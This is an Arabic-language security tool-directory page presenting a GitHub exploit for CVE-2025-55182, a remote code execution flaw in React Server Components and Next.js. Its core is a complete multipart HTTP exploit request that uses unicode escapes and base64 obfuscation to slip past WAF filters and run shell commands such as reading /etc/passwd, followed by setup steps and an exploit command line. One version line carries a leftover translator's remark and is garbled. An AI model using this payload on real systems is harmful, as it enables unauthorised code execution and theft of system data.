Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-React-RCE — [إعادة إظهار الثغرة] أول أداة استغلال في العالم تعتمد على ميزات RSC لتجاوز كشف WAF لثغرة CVE-2025-55182 React Server RCE. | Kitploit
أدوات/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقتطوير الحمولات
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[إعادة إظهار الثغرة] أول أداة استغلال في العالم تعتمد على ميزات RSC لتجاوز كشف WAF لثغرة CVE-2025-55182 React Server RCE.

عرض المستودع
154منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182-React-RCE

مقدمة المشروع والمبدأ

  • أول EXP في العالم لثغرة CVE-2025-55182 React Server RCE التي تتجاوز اكتشاف WAF باستخدام ميزات RSC.
  • The world’s first CVE‑2025‑55182 React Server RCE exploit that can bypass WAF detection by leveraging RSC-specific features.
  • تحقيق RCE في بيئة React Server الافتراضية.
  • إضافة EXP أصلي جديد يدعم سيناريوهات تجاوز WAF. المبدأ: في getOutlinedModel يمكن الإشارة عبر الكتل + الإشارة التدريجية إلى JSON.
  • توفير بيئة إعادة إنتاج مبسطة للغاية.

مميزات EXP

  • لا حاجة لـ __proto__:then و constructor:constructor لتحقيق RCE.
  • لن تظهر الكلمات المفتاحية التي يعترضها WAF بشكل متكرر مثل "then": $1:__proto__:then و "get": $1:constructor:constructor و require('child_process').
  • EXP واحد متوافق مع بيئات React Server الأصلية و Next.js و Dify بالإعدادات الافتراضية.
  • مميزات بيئة إعادة الإنتاج

    • بسيطة للغاية.
    • إعداد سريع.

    نظرة عامة على الثغرة

    معلوماتالمحتوى
    اسم الثغرةReact Server RCE
    رقم الثغرةCVE-2025-55182
    مستوى الخطرعالي
    نوع الثغرةRCE
    صعوبة الاستغلالمنخفضة

    الإصدارات المتأثرة

    • إصدارات React المتأثرة == 19.0.0
    • إصدارات React المتأثرة == 19.0.1
    • إصدارات React المتأثرة == 19.1.0
    • إصدارات React المتأثرة == 19.2.0
    • حزمة react-server-dom-webpack الإصدارات المتأثرة == 19.0.0، 19.0.1، 19.1.0، 19.1.1، 19.2.0
    • حزمة react-server-dom-parcel الإصدارات المتأثرة == 19.0.0، 19.0.1، 19.1.0، 19.1.1، 19.2.0
    • حزمة react-server-dom-turbopack الإصدارات المتأثرة == 19.0.0، 19.0.1، 19.1.0، 19.1.1، 19.2.0
    • إصدارات Next.js المتأثرة >= 14.3.0-canary.77
    • Next.js 15.0.0 <= الإصدارات المتأثرة < 15.0.5
    • Next.js 15.1.0 <= الإصدارات المتأثرة < 15.1.9
    • Next.js 15.2.0 <= الإصدارات المتأثرة < 15.2.6
    • Next.js 15.3.0 <= الإصدارات المتأثرة < 15.3.6
    • Next.js 15.4.0 <= الإصدارات المتأثرة < 15.4.8
    • Next.js 15.5.0 <= الإصدارات المتأثرة < 15.5.7
    • Next.js 16.0.0 <= الإصدارات المتأثرة < 16.0.7
    • Dify 1.1.2 <= الإصدارات المتأثرة < 10.1-fix.1 (تم تعديل "1.10.1-fix.1" إلى "10.1-fix.1" كما في النص الأصلي؟ لا، النص الأصلي يحتوي على 1.10.1-fix.1، يجب الحفاظ عليه. الترجمة: Dify 1.1.2 <= الإصدارات المتأثرة < 1.10.1-fix.1)

    EXP 1

    يمكن استخدامه لسيناريوهات تجاوز WAF + السيناريو الافتراضي:

    root@kitploit:~
    POST / HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: test
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Length: 1445
    
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="0"
    
    "$@1"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="1"
    
    {
        "\u0074\u0068\u0065\u006e": "$2:et",
        "status": "$2:es",
        "reason": "",
        "value": "$2:ev",
        "_response": "$2:er"
    }
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="2"
    
    {
        "et": "$3",
        "es": "$4",
        "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
        "er": {
            "_prefix": "$2:ep",
            "_formData": "$2:ef"
        },
        "ep": "$5",
        "ef": {
            "get": "$2:eg"
        },
        "eg": "$6"
    }
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="3"
    
    "$0:\u0074\u0068\u0065\u006e"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="4"
    
    "\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="5"
    
    "x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28%27Y2hpbGRfcHJvY2Vzcw%3D%3D%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28x))+'';throw Object.assign(new Error(y),{digest:y});"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="6"
    
    "$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad--
    

    إعادة الإنتاج 1

    1. بيئة الخادم:
    root@kitploit:~
    react-server-dom-webpack 19.2.0
    
    1. تنزيل وتثبيت التبعيات المطلوبة لـ react-server-dom-webpack على الخادم:
    root@kitploit:~
    git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
    cd CVE-2025-55182-React-RCE
    npm install
    npm run dev -- --hostname 127.0.0.1 --port 3000
    

    تم إنشاء الخدمة بنجاح: http://127.0.0.1:3000/

    1. استخدام EXP من العميل
    root@kitploit:~
    python3 -m venv .venv
    . ./.venv/bin/activate
    pip3 install requests
    python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
    

    إعادة الإنتاج 2

    1. بيئة الخادم:
    root@kitploit:~
    Next.js 16.0.6
    وهو يتوافق أيضًا مع react-server-dom-webpack 19.2.0
    
    1. تنزيل وتثبيت التبعيات المطلوبة لـ Next.js على الخادم:
    root@kitploit:~
    git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
    cd CVE-2025-55182-React-RCE
    npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
    cd nextapp
    npm run dev -- --hostname 127.0.0.1 --port 3000
    

    تم إنشاء الخدمة بنجاح: http://127.0.0.1:3000/

    1. استخدام EXP من العميل (نفس ما سبق)
    root@kitploit:~
    python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
    
    تنزيل الأداة